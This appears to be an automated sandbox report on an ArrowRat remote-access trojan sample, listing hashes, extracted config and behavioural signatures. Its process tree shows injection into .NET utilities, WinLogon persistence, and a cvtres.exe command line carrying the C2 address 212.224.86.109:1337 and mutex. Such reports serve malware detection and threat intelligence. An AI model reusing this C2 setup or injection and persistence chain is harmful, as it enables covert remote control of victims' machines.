Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-06-2023 14:23

General

  • Target

    file.exe

  • Size

    457KB

  • MD5

    288a04f04d9fc3e84ff5b2402c8050b1

  • SHA1

    8e0b920bb33920e298ac9f73ab4b7ea0bbdfdbf2

  • SHA256

    cd15fbc9e839dbc2888b3e72c47827e09a8bc50038a509f138c266ebcf2f3ed6

  • SHA512

    928b111cfb151ad8967e1bde8e1e17ab592f0312f3883b1faf6578401b49cc741dde7ae426ee1ef7d8c985b3e4d4b287ccabaf01ea3841f8438d4dc993d9b5fb

  • SSDEEP

    12288:QkoPbgRuF1R5u7w1eTe5XxLvZNOujzAKv546Q4dPHm:QkEb4E5u7w8Te5XxLhN9l54r4dHm

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

212.224.86.109:1337

Mutex

mTiBFWwWe

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1880
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
      2⤵
        PID:32
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
        2⤵
          PID:1780
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
          2⤵
            PID:1092
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
            2⤵
              PID:1904
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
              2⤵
                PID:4144
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                2⤵
                  PID:852
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
                  2⤵
                    PID:4128
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
                    2⤵
                    • Modifies WinLogon for persistence
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:1632
                    • C:\Windows\explorer.exe
                      "C:\Windows\explorer.exe"
                      3⤵
                      • Modifies Installed Components in the registry
                      • Enumerates connected drives
                      • Checks SCSI registry key(s)
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:4272
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 212.224.86.109 1337 mTiBFWwWe
                      3⤵
                        PID:4396
                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                    1⤵
                    • Modifies registry class
                    • Suspicious use of SetWindowsHookEx
                    PID:2292
                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                    1⤵
                    • Modifies registry class
                    • Suspicious use of SetWindowsHookEx
                    PID:2632

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133324357993792635.txt

                    Filesize

                    75KB

                    MD5

                    45b9fe0c8a715a7e5d787e28d63dfb31

                    SHA1

                    a10a98a8553958ab2f71f337a89d97daf69af8f0

                    SHA256

                    b643029e19de2599a5aa951c6dc6b300684d6c1410ae5639fab0b9683fb0480f

                    SHA512

                    240e899f9fbb71007c0814ea66c824a383c549a97662688945a63406c54631b86ae5b9c9b6271d2bd1c6909bb8ad04d74fa354250b7b540621fc75712415a03a

                  • memory/1632-142-0x0000000005890000-0x00000000058A0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1632-137-0x0000000005B90000-0x0000000006134000-memory.dmp

                    Filesize

                    5.6MB

                  • memory/1632-144-0x0000000005860000-0x000000000586A000-memory.dmp

                    Filesize

                    40KB

                  • memory/1632-282-0x0000000005890000-0x00000000058A0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1632-138-0x0000000005690000-0x000000000572C000-memory.dmp

                    Filesize

                    624KB

                  • memory/1632-141-0x0000000005940000-0x00000000059D2000-memory.dmp

                    Filesize

                    584KB

                  • memory/1632-135-0x0000000000400000-0x000000000042E000-memory.dmp

                    Filesize

                    184KB

                  • memory/1880-133-0x000001EE7D560000-0x000001EE7D5D6000-memory.dmp

                    Filesize

                    472KB

                  • memory/1880-134-0x000001EE7FAC0000-0x000001EE7FAD0000-memory.dmp

                    Filesize

                    64KB

                  • memory/2632-158-0x00000123DA2D0000-0x00000123DA2F0000-memory.dmp

                    Filesize

                    128KB

                  • memory/2632-161-0x00000123DA290000-0x00000123DA2B0000-memory.dmp

                    Filesize

                    128KB

                  • memory/2632-164-0x00000123DA6A0000-0x00000123DA6C0000-memory.dmp

                    Filesize

                    128KB

                  • memory/4272-152-0x0000000003610000-0x0000000003611000-memory.dmp

                    Filesize

                    4KB

                  • memory/4396-283-0x0000000005710000-0x0000000005720000-memory.dmp

                    Filesize

                    64KB

                  • memory/4396-143-0x0000000005710000-0x0000000005720000-memory.dmp

                    Filesize

                    64KB

                  • memory/4396-139-0x0000000000400000-0x0000000000418000-memory.dmp

                    Filesize

                    96KB

                  • memory/4396-148-0x0000000006860000-0x00000000068B0000-memory.dmp

                    Filesize

                    320KB

                  • memory/4396-145-0x00000000065A0000-0x0000000006606000-memory.dmp

                    Filesize

                    408KB